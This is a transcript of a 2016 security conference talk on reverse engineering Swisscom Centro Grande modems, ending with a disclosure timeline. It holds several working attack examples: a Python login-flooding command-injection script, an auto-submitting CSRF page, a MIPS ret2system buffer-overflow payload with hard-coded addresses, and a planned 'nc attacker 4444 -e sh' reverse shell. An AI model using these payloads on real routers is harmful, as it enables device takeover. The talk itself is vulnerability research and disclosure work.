
Reverse engineering Swisscom's Centro Grande Modem

Alain Mowat & Thomas Imbert, Cyber Security Conference 2016

Slide 1: Reverse engineering Swisscom’s Centro Grande modems
Alain Mowat & Thomas Imbert

Slide 2: whoami
› Alain Mowat (@plopz0r)
› Head of Audit division at SCRT
  › Pentest
  › Code review
  › Trainings
› Mostly a Web App guy
› Member of 0daysober CTF team
› Watch other people exploiting cool vulns

Slide 3: Background
› Why look into the Swisscom modems?
› Why this talk?
› I don’t actually own a Swisscom modem
  › Made it a bit harder to study...
Slide 4: Attack Surface
› ADB# show netstat
  tcp   0  0 192.168.1.1:50602      0.0.0.0:*   LISTEN
  tcp   0  0 127.0.0.1:9034         0.0.0.0:*   LISTEN
  tcp  11  0 192.168.1.1:8080       0.0.0.0:*   LISTEN
  tcp   0  0 0.0.0.0:80             0.0.0.0:*   LISTEN
  tcp   0  0 0.0.0.0:53             0.0.0.0:*   LISTEN
  tcp   0  0 192.168.1.1:22         0.0.0.0:*   LISTEN
  tcp   0  0 192.168.1.1:23         0.0.0.0:*   LISTEN
  tcp   0  0 0.0.0.0:7547           0.0.0.0:*   LISTEN
  udp   0  0 0.0.0.0:9090           0.0.0.0:*
  udp   0  0 127.0.0.1:15000        0.0.0.0:*
  udp   0  0 0.0.0.0:53             0.0.0.0:*
  udp   0  0 0.0.0.0:323            0.0.0.0:*
  udp   0  0 0.0.0.0:67             0.0.0.0:*
  udp   0  0 0.0.0.0:68             0.0.0.0:*
  udp   0  0 178.199.180.148:5060   0.0.0.0:*
  udp   0  0 192.168.1.1:5351       0.0.0.0:*
  udp   0  0 0.0.0.0:1900           0.0.0.0:*
  udp   0  0 192.168.1.1:47863      0.0.0.0:*
  udp   0  0 0.0.0.0:123            0.0.0.0:*
  udp   0  0 ff02::1:2:547          :::*
  udp   0  0 :::53                  :::*
  udp   0  0 :::323                 :::*
  udp   0  0 :::123                 :::*
  raw   0  0 0.0.0.0:2              0.0.0.0:*   2
  raw   0  0 0.0.0.0:6              0.0.0.0:*   6
  raw   0  0 :::58                  :::*
Slide 5: Attack Surface
› ADB# show processes
  PID    UID    VSZ   STAT  COMMAND
  256    0      2040  S     logd
  259    0      1308  S     klogd -c3
  271    0      832   S     ec
  343    0      3236  S     cm
  350    0      0     SW    [dsl0]
  363    0      0     SW    [bcmsw]
  364    0      0     SW    [bcmsw_timer]
  365    0      0     SW<   [linkwatch]
  5889   0      1132  S     dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
  6227   0      1312  S     telnetd Local -u 20 -b 192.168.1.1:23 -I 300
  6898   65534  2292  S     nhttpd -c /tmp/nhttpd.conf
  7362   0      1000  S     dhcps /tmp/dhcps.conf
  7910   0      764   S     dns
  8014   0      1088  S     miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
  8026   0      736   S     /bin/wpspbc
  8223   0      2676  S     /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
  9164   0      1664  S     /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
  9177   0      2940  S     cwmp
  9204   0      1316  S     /bin/sh /etc/ah/printk_dump.sh
  9353   0      884   S     ec
  9553   0      1312  S     /bin/sh /etc/ah/procSentinel.sh cm 300
  11846  0      1332  S     /bin/sh DHCPv4Client.sh
  11848  0      1320  S     udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
  14753  0      792   S     igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
  15287  0      3576  S     voip
  15688  0      740   S     tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
  15923  0      1056  S N   chronyd -f /tmp/chrony.conf
  16770  0      820   S     radvd
  16812  0      2036  S     dibbler-server start
Slide 6: Finding the firmware
› Locate the firmware
  › https://www.swisscom.ch/en/residential/help/device/internet-router/centro-grande.html
  › Vx226x1_61400.sig
› Version at the time: 6.14.00

Slide 7: Extracting the firmware
› Binwalk (https://github.com/devttys0/binwalk)
› Firmware modification kit
  › ./extract-firmware.sh

Slide 8: CPE WAN Management Protocol
› Also known as TR-069
› Protocol that defines how to manage "Customer-premises Equipment"
› cwmp binary
  › Listens on 0.0.0.0:7547
  › iptables rule allows access only from certain Swisscom subnets

Slide 9: Web interface
› Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
› If a binary file is accessed through the web interface, it executes it
› Directory traversal → code execution in version 1.9.3

Slide 10: Web interface
› Mostly managed by a CGI called ui

Slide 11: Emulating the device
› OpenWRT (https://openwrt.org/): Linux distribution for embedded devices
› Qemu (http://wiki.qemu.org/Main_Page): machine emulator and virtualizer
Slide 12: Configuring OpenWRT
› make menuconfig
  › MIPS target
  › Add all debugging and networking tools
› Cross-compile nhttpd
› Generate ramdisk
› Copy Swisscom firmware files to the image
› Run image with qemu
  qemu-system-mips -kernel openwrt-malta-be-vmlinux-initramfs.elf -net tap -net nic -nographic -m 2048
Slide 13: Setting up the image
› nhttpd server configuration
  serverroot    /www
  serveradmin   webmaster@adbglobal.com
  servermimes   conf/mimes
  docroot       /www/htdocs
  docindex      lanhosts
  logpid        /tmp/logs
  user          nobody
  disablehttp   0
  notfound      501
  sslport       443
  sslcert       /etc/certs/server.crt
  sslcertkey    /etc/certs/server.key
  sslcertca     /etc/certs/ca.pem
  sslcertreq    *
  serverlisten  0.0.0.0
  servername    localhost
Slide 14: Web interface

Slide 15: YAPL ?

Slide 16: Web request overview
  POST /ui/swc/login → nhttpd → ui → cm
  › nhttpd: environment setup
  › ui: get the corresponding YAPL "script" (swc_login.yapl, swc_common.yapl, swc_firewall.yapl, ...)
  › cm: configuration command

Slide 17: Configuration manager
› Used to view and modify the device’s configuration
› Bound to localhost:9034
  › Also /tmp/cmctl socket
› Several possible commands
  › GETO, GETV, …
  › SET, SETM, …
  › RESET, REBOOT, ...
  › DUMP, EXPORT, ...

Slide 18: Mandatory IDA graph

Slide 19: Configuration manager
› Main loop (pseudocode)
  listen on localhost port 9034
  socket = accept()
  while 1:
      input = socket.recv(16384)
      handleRequest(input)

  def handleRequest(input):
      type = validateRequestType(input)
      params = validateRequestParams(input)
      callTypeHandler(params)

Slide 20: Configuration Manager
Slide 21: Finalizing the image setup
› Shell:
  udhcpc -i br-lan
  cm
  touch /tmp/cmctl
  chmod 777 /tmp/cmctl
  nhttpd -c /www/nhttpd.cfg
  nc localhost 9034
› Commands sent to cm over the nc session:
  DOM Device /etc/cm/tr181/dom/
  DOM InternetGatewayDevice /etc/cm/tr098/dom/
  CONF /etc/cm/conf/
  ADD InternetGatewayDevice.WANDevice
  ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
  ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
  SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
  SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
  SET Device.IP.Interface.1.Status Up
  SET Device.Ethernet.Link.1.Name br-lan
  SET Device.DeviceInfo.SerialNumber 123456
  SET Device.IP.Interface.1.X_ADB_Upstream true
  SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
Slide 22: Running image

Slide 23: Configuration manager
› Special syntax, similar to SQL in certain ways
  › SELECT =~ GETV
  › UPDATE =~ SET
› Conditions
  › GETO A.B.C.[Test=1]
  › GETO A.B.C.[Test~1]
  › GETO A.B.C.[Test!1]

Slide 24: Vulnerability #1: Command overflow
› Each call to recv is treated as a new command
› By sending more than 16384 characters, we can craft a new configuration command
› Logging in to the web interface generates a call to the configuration manager that looks like this:
  GETO Users.User.[Username=ATTACKER_CONTROLLED]
› By providing a long username, we can exceed the 16384-byte limit and generate a new request within the configuration manager
› Allows complete control over the device
  › Change passwords
  › Allow remote access
  › ...
Slide 25: Vulnerability #1: Command overflow
  ui → cm:  GETO Users.User.[Username=AAAAAAAAAAAAAAAAAAAAAAAAAAA[…]AAAAAAAAAAAAAAAAAAAAAAAAAAAREBOOT\n
  cm:       recv(16384) → process(‘GETO Users……’)
  cm:       recv(16384) → process(‘REBOOT’)
  cm → ui:  send
Slide 26: Exploit #1: Command overflow
  from requests import post

  payload = dict()
  # 'GETO Users.User.[Username=' is 26 bytes; 26 + 16358 = 16384 fills the
  # first recv() exactly, so 'REBOOT\n' arrives in the next recv() and is
  # processed as a command of its own.
  payload['userName'] = 16358 * 'a' + 'REBOOT' + '\n'
  payload['userPwd'] = 'a'
  payload['login'] = 'Login'
  payload['language'] = ''

  while 1:
      r = post('http://192.168.1.1/ui/swc/login/index', data=payload)
  (DEMO)
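To make the boundary arithmetic of slides 24 to 26 concrete, the following is an added example, written for this page and not code from the talk or from the ADB firmware. It models the cm dispatch loop as the slides describe it (every recv() of at most 16384 bytes is parsed as one command), builds the padded username, and shows how the injected REBOOT becomes a second command. Next to it is a framed dispatcher that treats one newline-terminated line as one command and rejects a line that does not fit, which is what stops the split. The function names are ours; the GETO prefix is the one from slide 24 and the closing "]\n" suffix is an assumption about how ui terminates the request.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not firmware code. RECV_SIZE is the recv() size shown
 * on slide 19; PREFIX is the request shown on slide 24; SUFFIX is our
 * assumption about how ui closes the condition. */
#define RECV_SIZE 16384

static const char PREFIX[] = "GETO Users.User.[Username=";
static const char SUFFIX[] = "]\n";

/* Username that pushes an injected command into the *second* recv():
 * pad so PREFIX + padding fills exactly RECV_SIZE bytes, then append the
 * injected command and a newline. Caller frees the result. */
char *build_username(const char *injected)
{
    size_t pad = RECV_SIZE - strlen(PREFIX);      /* 16384 - 26 = 16358 */
    size_t inj = strlen(injected);
    char *u = malloc(pad + inj + 2);
    memset(u, 'a', pad);
    memcpy(u + pad, injected, inj);
    u[pad + inj] = '\n';
    u[pad + inj + 1] = '\0';
    return u;
}

/* What ui would hand to cm for one login attempt. Caller frees. */
char *make_login_request(const char *username)
{
    size_t n = strlen(PREFIX) + strlen(username) + strlen(SUFFIX);
    char *s = malloc(n + 1);
    strcpy(s, PREFIX);
    strcat(s, username);
    strcat(s, SUFFIX);
    return s;
}

/* Copy one command (up to the first newline) out of a buffer. */
static char *first_line(const char *p, size_t n)
{
    size_t l = 0;
    while (l < n && p[l] != '\n') l++;
    char *c = malloc(l + 1);
    memcpy(c, p, l);
    c[l] = '\0';
    return c;
}

/* Vulnerable dispatcher: consumes the request in RECV_SIZE chunks and
 * parses each chunk as a fresh command. Returns the number of commands
 * and stores them (malloc'd) in cmds[]. */
int dispatch_unframed(const char *req, char *cmds[], int max)
{
    size_t len = strlen(req), off = 0;
    int n = 0;
    while (off < len && n < max) {
        size_t chunk = len - off < RECV_SIZE ? len - off : RECV_SIZE;
        cmds[n++] = first_line(req + off, chunk);
        off += chunk;
    }
    return n;
}

/* Hardened dispatcher: a command is exactly one newline-terminated line,
 * and a line that does not fit the buffer is rejected (returns -1)
 * instead of being cut into two commands. */
int dispatch_framed(const char *req, char *cmds[], int max)
{
    size_t len = strlen(req), start = 0;
    int n = 0;
    for (size_t i = 0; i < len && n < max; i++) {
        if (req[i] != '\n') continue;
        if (i - start >= RECV_SIZE) return -1;   /* over-long line: drop it */
        cmds[n++] = first_line(req + start, i - start);
        start = i + 1;
    }
    if (start < len) return -1;                 /* unterminated trailing data */
    return n;
}

int main(void)
{
    char *cmds[4];
    char *req = make_login_request(build_username("REBOOT"));
    int n = dispatch_unframed(req, cmds, 4);
    printf("unframed: %d commands, last = \"%s\"\n", n, cmds[n - 1]);
    printf("framed:   %d (negative means rejected)\n", dispatch_framed(req, cmds, 4));
    return 0;
}
```

Run stand-alone, the unframed dispatcher reports two commands with "REBOOT" as the second, while the framed one rejects the same request because the single line is longer than the buffer.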
Slide 27: Vulnerability #2: Login CSRF
› Use CSRF to exploit someone else’s device
  <html>
  <body>
  <form method="POST" action="http://192.168.1.1/ui/swc/login/index">
    <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/>
    <input type="hidden" name="userPwd" value="a"/>
    <input type="hidden" name="login" value="login"/>
    <input type="hidden" name="language" value=""/>
  </form>
  <script>
    document.forms[0].submit();
  </script>
  </body>
  </html>

Slide 28: Exposed web interfaces – Centro Business
Slide 29: Vulnerability #3: Buffer overflow(s)
› Buffer overflow when parsing the name of XML files while performing certain commands (CONF, DOM, …)
› Requirements
  › Arbitrarily-named XML file on the device
  › file and folder are each limited to 4096 bytes, but the destination buffer is also 4096 bytes and strncat’s bound only limits each appended part, so folder + file together can overflow it
  parseFilesInFolder(folder):
      char path[4096];
      files = scandir(folder)
      for file in files:
          if file ends with ".xml":
              strncat(path, folder, 4096)
              strncat(path, file, 4096)
              parseFile(path)
Slide 30: Exploit #3: Creating the XML file
› The PATHSAVE command takes 2 arguments
  › An XML filename
  › Property that needs to be saved
  PATHSAVE /tmp/test.xml Users.User.1.Password
› Can use this to write an arbitrarily-named file on the device
› Exploit can then be triggered by prepending the folder with lots of /
  CONF /////////////////////////////////////[…]/tmp/exploit.xml
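The strncat misuse of slide 29 and the slash-padded folder of slide 30 are worth seeing side by side. The following is an added example written for this page, not the firmware’s code: it computes how many bytes the slide’s two strncat calls write (rather than executing the overflow), puts a correctly bounded join next to it, and builds the kind of folder argument the CONF trigger uses. The 4096 limit is the one stated on the slide; the function names are ours.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not firmware code. PATH_MAX_SLIDE is the buffer and
 * argument limit given on slide 29. */
#define PATH_MAX_SLIDE 4096

/* Bytes written into path by the vulnerable sequence of slide 29:
 *     char path[4096]; path[0] = 0;
 *     strncat(path, folder, 4096);
 *     strncat(path, file, 4096);
 * strncat(dst, src, n) appends up to n bytes of src plus a NUL, starting
 * at the current end of dst, so n bounds the appended part, not the
 * whole buffer. Two appends of up to 4096 each cannot fit in 4096. */
size_t vulnerable_join_len(size_t folder_len, size_t file_len)
{
    size_t a = folder_len < PATH_MAX_SLIDE ? folder_len : PATH_MAX_SLIDE;
    size_t b = file_len < PATH_MAX_SLIDE ? file_len : PATH_MAX_SLIDE;
    return a + b + 1;                          /* +1 for the final NUL */
}

int vulnerable_join_overflows(size_t folder_len, size_t file_len)
{
    return vulnerable_join_len(folder_len, file_len) > PATH_MAX_SLIDE;
}

/* Correct join: bound each append by the space actually left, and refuse
 * (return -1) when the result would not fit, instead of truncating to a
 * path that silently points somewhere else. */
int safe_join(char *dst, size_t dstsz, const char *folder, const char *file)
{
    size_t need = strlen(folder) + strlen(file);
    if (dstsz == 0 || need >= dstsz) return -1;
    dst[0] = '\0';
    strncat(dst, folder, dstsz - 1);
    strncat(dst, file, dstsz - strlen(dst) - 1);
    return 0;
}

/* The trigger shape from slide 30: many '/' characters ahead of the real
 * directory. Caller frees. */
char *make_slash_folder(size_t slashes, const char *real)
{
    size_t r = strlen(real);
    char *f = malloc(slashes + r + 1);
    memset(f, '/', slashes);
    memcpy(f + slashes, real, r + 1);
    return f;
}

int main(void)
{
    char path[PATH_MAX_SLIDE];
    char *folder = make_slash_folder(4090, "/tmp/");   /* 4095 bytes */
    printf("vulnerable pattern writes %zu bytes into a %d-byte buffer\n",
           vulnerable_join_len(strlen(folder), strlen("exploit.xml")),
           PATH_MAX_SLIDE);
    printf("safe_join: %d\n", safe_join(path, sizeof path, folder, "exploit.xml"));
    free(folder);
    return 0;
}
```

With a 4095-byte folder and "exploit.xml", the vulnerable pattern writes 4107 bytes into a 4096-byte buffer, while safe_join refuses the request; an ordinary "/etc/cm/conf/" + "device.xml" fits in both.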
Slide 31: Exploit #3: Exploiting a MIPS binary
  Prologue / Epilogue

Slide 32: Exploit #3: Exploiting a MIPS binary
› No ASLR on the device
› No NX
› No canaries
› A version of nc with the -e switch is present on the device
› Try to call system(‘nc attacker 4444 -e sh’)
› Arguments are not passed on the stack, but in registers
  › $a0
  › $a1
  › …

Slide 33: Exploit #3: ret2system
› Quick analysis gives the address of system in libuClibc (Centro Business):
  › libuClibc base: 0x2aaf8000
  › system at offset: 0x54610
  › Real address: 0x2ab4c610
› Need a gadget in order to get our argument to system into $a0
  › Make $a0 point to an address in the stack
  › $s0 is also under our control
Slide 34: Exploit #3: ret2system
  /tmp/aaaaaaaaaaaaaaaa\x2a\xb4\xc6\x10bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\x2a\xb1\xca\xac + 64 * ‘a’ + reboot; #bbbb.xml
  › \x2a\xb4\xc6\x10: saved $s0 → system (0x2ab4c610)
  › \x2a\xb1\xca\xac: saved $ra → gadget (addiu $a0,$sp,64)
  › 64 * ‘a’: padding so that $sp+64 points at the system command
  › reboot; #bbbb.xml: the system command
Slide 35: Exploit #3: Full exploit (DEMO)

Slide 36: Disclosure timeline
› 9 September 2015: Initial disclosure to Swisscom
› 10 September 2015: Vulnerabilities acknowledged by Swisscom
› 11 September 2015: Vendor notified (ADB)
› 18 September 2015: Confirmation of vulns & quick fix available
› 24 September 2015: Test of quick fix
› 29 September 2015: Contact with ADB
› October 2015: Rollout of quick fix to all devices
› January 2016: Status of full fix:
  › Centro Grande: 100 %
  › Centro Business 1.0: 50 %
  › Centro Business 2.0: 100 %
› 13 June 2016: Disclosure

Slide 37: Swisscom bounty
› Combination of flaws rewarded with 3’000 CHF
› Donated to the Ligue Vaudoise contre le Cancer
› Swisscom Bug Bounty program is up & running
  › Talk is tomorrow afternoon :)

Slide 38: Conclusions
› Attackers
  › Look into other processes on the modem
    › miniupnp
    › voip
  › Embedded devices are found everywhere nowadays: huge attack surface
  › Fewer people reverse firmware than search for XSS
› Defenders
  › Consider 0days in your penetration tests
  › Test your defense in depth
  › Test your ability to detect breaches
